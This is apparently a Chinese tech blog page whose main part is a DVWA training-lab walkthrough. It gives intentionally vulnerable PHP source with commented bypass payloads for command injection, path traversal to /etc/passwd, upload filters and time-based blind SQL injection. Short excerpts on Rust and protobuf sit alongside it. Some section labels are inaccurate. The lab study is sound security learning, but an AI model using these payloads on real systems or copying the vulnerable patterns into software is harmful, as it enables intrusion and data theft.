思考

Rust这个语言是我大概去年年中学的, 虽然一只在用, 都没评价这个语言, 这次有点空可以稍微说一下.. 有些人觉得Rust很难, 确实, 我不反驳, 但是也就起步比较难. 编程范式比起C++/JAVA入门就多出一大截, 一大堆概念往脑子里灌, 所有权, 智能指针等之类的. 还有一堆花里胡哨的语法. ...

我们先来看这样一段代码: 1impl View for Button { ... } 2 3impl View for Text { ... } 我们看到Button和Text都实现了View属性, 抽象是一种不错的设计程序的方法, 帮助我们透明化的使用外部提供的API. 然后我们可能会下意识的写出下面的代码: ...

细心的人可能注意到我这几天都在写JS, 因为这边的公司人手其实缺乏很严重, 很多都是做后端的, 而且后端并不是全部Java, 有相当部分是Python写的. 我在大学期间为了选择以后的WEB方向, 一狠心把当时比较前沿的WEB技术全部学了一遍, 包括前端的一些框架, 最后选择了WEB后端, 语言为Go, 或者Java. 也算半个全栈吧. ...

LOW 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 $target = $_REQUEST[ 'ip' ]; 4 5 // 没有任何过滤 6 // 直接运行 ping $param 7 8 // 可以尝试运行各种奇怪的命令组合 9 // 输入 localhost && ls 10 11 // Determine OS and execute the ping command. 12 if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 13 // Windows 14 $cmd = shell_exec( 'ping ' . $target ); 15 } 16 else { 17 // *nix 18 $cmd = shell_exec( 'ping -c 4 ' . $target ); 19 } 20 21 // Feedback for the end user 22 echo "<pre>{$cmd}</pre>"; 23} Medium 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 $target = $_REQUEST[ 'ip' ]; 4 5 // Set blacklist 6 // 黑名单式过滤 7 $substitutions = array( 8 '&&' => '', 9 ';' => '', 10 ); 11 12 // 然而过滤的并不严谨 13 // 使用 localHost &&& ls 14 // 或者管道?(Linux) 15 // localhost | ls` 16 17 // Remove any of the charactars in the array (blacklist). 18 $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 19 20 // Determine OS and execute the ping command. 21 if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 22 // Windows 23 $cmd = shell_exec( 'ping ' . $target ); 24 } 25 else { 26 // *nix 27 $cmd = shell_exec( 'ping -c 4 ' . $target ); 28 } 29 30 // Feedback for the end user 31 echo "<pre>{$cmd}</pre>"; 32} High 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 $target = trim($_REQUEST[ 'ip' ]); 4 5 // 过滤的更猛了 6 // Set blacklist 7 $substitutions = array( 8 '&' => '', 9 ';' => '', 10 '| ' => '', 11 '-' => '', 12 '$' => '', 13 '(' => '', 14 ')' => '', 15 '`' => '', 16 '||' => '', 17 ); 18 19 // 然而只过滤一遍 20 // localhost |||| 21 22 // Remove any of the charactars in the array (blacklist). 23 $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 24 25 // Determine OS and execute the ping command. 26 if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 27 // Windows 28 $cmd = shell_exec( 'ping ' . $target ); 29 } 30 else { 31 // *nix 32 $cmd = shell_exec( 'ping -c 4 ' . $target ); 33 } 34 35 // Feedback for the end user 36 echo "<pre>{$cmd}</pre>"; 37}

是一种SSRF漏洞 Low 1// 非常单纯, 随便读取 2// http://192.168.32.114/vulnerabilities/fi/?page=../../../../../../etc/passwd 3// The page we wish to display 4$file = $_GET[ 'page' ]; Medium 1// The page we wish to display 2$file = $_GET[ 'page' ]; 3 4// 过滤一部分字符 5// 不允许 HTTP,HTTPS 协议 6// 利用目录结构读取也不行 7 8// 然而没有过滤全 9// http://192.168.32.114/vulnerabilities/fi/?page=/etc/passwd 10 11// Input validation 12$file = str_replace( array( "http://", "https://" ), "", $file ); 13$file = str_replace( array( "../", "..\"" ), "", $file ); High 1// The page we wish to display 2$file = $_GET[ 'page' ]; 3 4// Input validation 5// 对$file 字符串做匹配 6// 只能匹配 file* 的文件路径 7// 还有 include.php 文件路径 8 9// 这个过滤还是八星 10// 利用`本地文件传输协议` 11// http://192.168.32.114/vulnerabilities/fi/?page=file:///etc/passwd 12 13// 或者这样 14// http://192.168.32.114/vulnerabilities/fi/?page=file123123/../../../../../../etc/passwd 15 16if( !fnmatch( "file*", $file ) && $file != "include.php" ) { 17 // This isn't the page we want! 18 echo "ERROR: File not found!"; 19 exit; 20} Impossible 1// The page we wish to display 2$file = $_GET[ 'page' ]; 3 4// Only allow include.php or file{1..3}.php 5// 强匹配 6// 从程序员的角度来说这种代码的维护性极差 7// 从安全的角度上来说这是最安全的方案 8if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { 9 // This isn't the page we want! 10 echo "ERROR: File not found!"; 11 exit; 12}

LOW 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // Can we move the file to the upload folder? 7 // 完全没做过滤. 8 // 上传一个PHP文件也是可以的. 9 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 10 // No 11 echo '<pre>Your image was not uploaded.</pre>'; 12 } 13 else { 14 // Yes! 15 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 16 } 17} Medium 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 9 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 10 11 // Is it an image? 12 // // 开始做了一些过滤 13 14 // 下面是官方对$_FILES 函数的描述 15 // [name] => MyFile.txt (comes from the browser, so treat as tainted) 16 // [type] => text/plain (not sure where it gets this from - assume the browser, so treat as tainted) 17 // [tmp_name] => /tmp/php/php1h4j1o (could be anywhere on your system, depending on your config settings, but the user has no control, so this isn't tainted) 18 // [error] => UPLOAD_ERR_OK (= 0) 19 // [size] => 123 (the size in bytes) 20 21 // 其中对name和type的description的描述都是 `treat as tainted`(被污染的) 22 // 这意味着它有可能会被修改 unsafe 23 24 // 我们可以尝试上传一个PHP文件，使用一些拦截请求工具，修改即将发出的请求. 25 // 来达到修改`name`中的后缀名和`type`中的媒体类型. 26 if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 27 ( $uploaded_size < 100000 ) ) { 28 29 // Can we move the file to the upload folder? 30 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 31 // No 32 echo '<pre>Your image was not uploaded.</pre>'; 33 } 34 else { 35 // Yes! 36 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 37 } 38 } 39 else { 40 // Invalid file 41 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 42 } 43} High 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 // jpg 9 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 10 11 // file size 12 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 13 14 // tmp_name 是临时副本的名字 15 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 16 17 // Is it an image? 18 // 和上面的比起来多个一个文件后缀名的判断. 19 // strtolower 转小写 20 // 扩展名只要满足jpeg,png或者jpg就行 21 if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 22 ( $uploaded_size < 100000 ) && 23 // getimagesize 获取图像信息 24 // 这个函数保证你穿的一定得是个图像 25 // 可以用图片木马绕过 26 getimagesize( $uploaded_tmp ) ) { 27 28 // Can we move the file to the upload folder? 29 if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 30 // No 31 echo '<pre>Your image was not uploaded.</pre>'; 32 } 33 else { 34 // Yes! 35 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 36 } 37 } 38 else { 39 // Invalid file 40 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 41 } 42} High 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 9 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 10 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 11 12 // Is it an image? 13 // 对比上面多验证了文件的后缀名 14 if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 15 ( $uploaded_size < 100000 ) && 16 17 // 函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错 18 getimagesize( $uploaded_tmp ) ) { 19 20 // 可以看到，High级别的代码读取文件名中最后一个”.”后的字符串，期望通过文件名来限制文件类型 21 // 因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一 22 // 同时，getimagesize函数更是限制了上传文件的文件头必须为图像类型 23 24 // Can we move the file to the upload folder? 25 if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 26 // No 27 echo '<pre>Your image was not uploaded.</pre>'; 28 } 29 else { 30 // Yes! 31 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 32 } 33 } 34 else { 35 // Invalid file 36 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 37 } 38} Impossible 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Check Anti-CSRF token 3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 4 5 // File information 6 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 7 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 8 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 9 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 10 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 11 12 // Where are we going to be writing to? 13 $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 14 //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 15 16 // MD5 加密 17 $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 18 $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 19 $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 20 21 // Is it an image? 22 if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) && 23 ( $uploaded_size < 100000 ) && 24 ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 25 getimagesize( $uploaded_tmp ) ) { 26 27 // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 28 if( $uploaded_type == 'image/jpeg' ) { 29 $img = imagecreatefromjpeg( $uploaded_tmp ); 30 imagejpeg( $img, $temp_file, 100); 31 } 32 else { 33 $img = imagecreatefrompng( $uploaded_tmp ); 34 imagepng( $img, $temp_file, 9); 35 } 36 imagedestroy( $img ); 37 38 // Can we move the file to the web root from the temp folder? 39 if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 40 // Yes! 41 echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 42 } 43 else { 44 // No 45 echo '<pre>Your image was not uploaded.</pre>'; 46 } 47 48 // Delete any temp files 49 if( file_exists( $temp_file ) ) 50 unlink( $temp_file ); 51 } 52 else { 53 // Invalid file 54 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 55 } 56} 57 58// Generate Anti-CSRF token 59generateSessionToken(); Extension 00%截断 ...

返回的结果集无法看到，只能通过一些页面显示或状态来判断。 像瞎子一样。 Low 1if(isset( $_GET[ 'Submit' ])) { 2 // Get input 3 $id = $_GET[ 'id' ]; 4 5 // Check database 6 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 7 // 没有一点点防备 8 // 尝试构造: (由于看不到结果集，所以脱裤子的语句是无效) 9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,2 # '; 10 // User ID exists in the database. <存在注入漏洞> 11 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length( database())=4,sleep(4),2) # '; 12 13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 14 15 // Get results 16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors 17 if( $num > 0 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // User wasn't found, so the page wasn't! 23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 24 25 // Feedback for end user 26 echo '<pre>User ID is MISSING from the database.</pre>'; 27 } 28 29 mysql_close(); 30} MIEDUM 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 $id = $_POST[ 'id' ]; 4 $id = mysql_real_escape_string( $id ); 5 6 // Check database 7 $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 8 // 尝试构造: 9 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,2; 10 // 以上判断存在注入漏洞 11 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,if(length(database()) > 4, sleep(3), 2) 12 13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 14 15 // Get results 16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors 17 if( $num > 0 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // Feedback for end user 23 echo '<pre>User ID is MISSING from the database.</pre>'; 24 } 25 26 //mysql_close(); 27} High 1if( isset( $_SESSION['id'])){ 2 // Get input 3 $id = $_SESSION[ 'id' ]; 4 5 // Check database 6 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 7 // 没有新花样，只限制输出条目是无法拦住我们的 8 // 尝试构造: 9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length(database()) = 4, sleep(3), 2) # LIMIT 1; 10 $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' ); 11 12 // Get results 13 $num = mysql_numrows( $result ); 14 $i = 0; 15 while( $i < $num ) { 16 // Get values 17 $first = mysql_result( $result, $i, "first_name" ); 18 $last = mysql_result( $result, $i, "last_name" ); 19 20 // Feedback for end user 21 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 22 23 // Increase loop count 24 $i++; 25 } 26 27 mysql_close(); 28} High 1if( isset( $_GET[ 'Submit' ] ) ) { 2 // Check Anti-CSRF token 3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 4 5 // Get input 6 $id = $_GET[ 'id' ]; 7 8 // Was a number entered? 9 if(is_numeric( $id )) { 10 // Check the database 11 // PDO 无法注入 12 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 13 $data->bindParam( ':id', $id, PDO::PARAM_INT ); 14 $data->execute(); 15 16 // Get results 17 if( $data->rowCount() == 1 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // User wasn't found, so the page wasn't! 23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 24 25 // Feedback for end user 26 echo '<pre>User ID is MISSING from the database.</pre>'; 27 } 28 } 29} 30 31// Generate Anti-CSRF token 32generateSessionToken();

protobuf 的 message 中有很多字段,每个字段的格式为: 修饰符 字段类型 字段名 = 域号; 在序列化时,protobuf 按照 TLV 的格式序列化每一个字段,T 即 Tag,也叫 Key;V 是该字段对应的值 v 省略。 序列化后的 Value 是按原样保存到字符串或者文件中,Key 按照一定的转换条件保存起来,序列化后的 message 中字段后面的域号与字段类型来转换。转换公式如下: ...